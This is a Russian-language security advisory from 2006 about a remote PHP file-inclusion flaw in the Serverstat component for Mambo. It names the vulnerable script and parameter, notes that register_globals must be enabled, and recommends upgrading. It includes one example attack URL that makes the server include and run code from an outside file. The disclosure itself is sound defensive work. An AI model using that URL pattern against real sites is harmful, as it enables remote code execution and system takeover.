PHP-инклюдинг в Mambo Serverstat

Дата публикации:
18.09.2006
Всего просмотров:
9080
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Serverstat 0.x (компонент к Mambo)
Уязвимые версии: Serverstat (компонент Mambo) 0.4.4, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_serverstat/install.serverstat.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=[http://file]

URL производителя: mamboxchange.com/projects/serverstat/

Решение: Установите последнюю версию (0.6.2) с сайта производителя.

Ссылки: Mambo com_serverstat Component <= 0.4.4 File Include Vulnerability

или введите имя

CAPTCHA